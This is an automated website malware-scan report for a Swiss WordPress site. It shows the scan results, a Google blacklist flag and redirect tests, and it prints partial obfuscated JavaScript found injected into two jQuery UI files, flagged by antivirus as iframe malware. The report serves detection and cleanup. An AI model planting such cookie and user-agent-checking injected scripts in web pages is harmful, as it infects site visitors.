New scan:

Malware Scanner report for gravity-entertainment.ch

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "gravity-entertainment.ch" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/10
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=gravity-entertainment.ch

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://gravity-entertainment.ch/
200 OK
Content-Length: 15664
Content-Type: text/html
clean
http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js?ver=2.2
200 OK
Content-Length: 10220
Content-Type: text/javascript
clean
http://gravity-entertainment.ch/wp-includes/js/jquery/jquery.js?ver=1.8.3
200 OK
Content-Length: 94712
Content-Type: application/x-javascript
clean
http://gravity-entertainment.ch/wp-content/plugins/scodes/js/shortcodes.js?ver=3.5.1
200 OK
Content-Length: 1384
Content-Type: application/x-javascript
clean
http://gravity-entertainment.ch/wp-includes/js/wp-ajax-response.min.js?ver=3.5.1
200 OK
Content-Length: 3206
Content-Type: application/x-javascript
clean
http://gravity-entertainment.ch/wp-content/plugins/theme-my-login/modules/ajax/js/ajax.js?ver=3.5.1
200 OK
Content-Length: 2748
Content-Type: application/x-javascript
clean
http://gravity-entertainment.ch/wp-content/themes/ge/js/modernizr.js?ver=2.6.2
200 OK
Content-Length: 9269
Content-Type: application/x-javascript
clean
http://gravity-entertainment.ch/de/
200 OK
Content-Length: 15664
Content-Type: text/html
clean
http://gravity-entertainment.ch/bands/
200 OK
Content-Length: 29517
Content-Type: text/html
clean
http://gravity-entertainment.ch/wp-content/plugins/scodes/js/jquery.easing.1.3.js?ver=1.3
200 OK
Content-Length: 9155
Content-Type: application/x-javascript
clean
http://gravity-entertainment.ch/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.9.2
200 OK
Content-Length: 5747
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t
... 3146 bytes are skipped ...
arentNode||e.element[0].parentNode.nodeType===11)return;for(r=0;r<i.length;r++)e.options[i[r][0]]&&i[r][1].apply(e.element,n)}},contains:e.contains,hasScroll:function(t,n){if(e(t).css("overflow")==="hidden")return!1;var r=n&&n==="left"?"scrollLeft":"scrollTop",i=!1;return t[r]>0?!0:(t[r]=1,i=t[r]>0,t[r]=0,i)},isOverAxis:function(e,t,n){return e>t&&e<t+n},isOver:function(t,n,r,i,s,o){return e.ui.isOverAxis(t,r,s)&&e.ui.isOverAxis(n,i,o)}})})(jQuery);

Antivirus reports:

Avast
HTML:Iframe-inf

http://gravity-entertainment.ch/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.9.2
200 OK
Content-Length: 7813
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t
... 3143 bytes are skipped ...
{},typeof i=="number"&&(i={duration:i}),o=!e.isEmptyObject(i),i.complete=s,i.delay&&r.delay(i.delay),o&&e.effects&&(e.effects.effect[u]||e.uiBackCompat!==!1&&e.effects[u])?r[t](i):u!==t&&r[u]?r[u](i.duration,i.easing,s):r.queue(function(n){e(this)[t](),s&&s.call(r[0]),n()})}}),e.uiBackCompat!==!1&&(e.Widget.prototype._getCreateOptions=function(){return e.metadata&&e.metadata.get(this.element[0])[this.widgetName]})})(jQuery);

Antivirus reports:

Avast
HTML:Iframe-inf

http://gravity-entertainment.ch/wp-includes/js/jquery/ui/jquery.ui.tabs.min.js?ver=1.9.2
200 OK
Content-Length: 19626
Content-Type: application/x-javascript
clean
http://gravity-entertainment.ch/wp-includes/js/jquery/ui/jquery.ui.accordion.min.js?ver=1.9.2
200 OK
Content-Length: 11508
Content-Type: application/x-javascript
clean
http://gravity-entertainment.ch/wp-content/themes/ge/js/jquery.fitvids.js?ver=1.0
200 OK
Content-Length: 3170
Content-Type: application/x-javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: gravity-entertainment.ch

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 07 Oct 2014 03:31:40 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=gravity-entertainment.ch
X-Pingback: http://gravity-entertainment.ch/xmlrpc.php
X-Powered-By: PHP/5.3.27
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: gravity-entertainment.ch
Referer: http://www.google.com/search?q=gravity-entertainment.ch

Result:
The result is similar to the first query. There are no suspicious redirects found.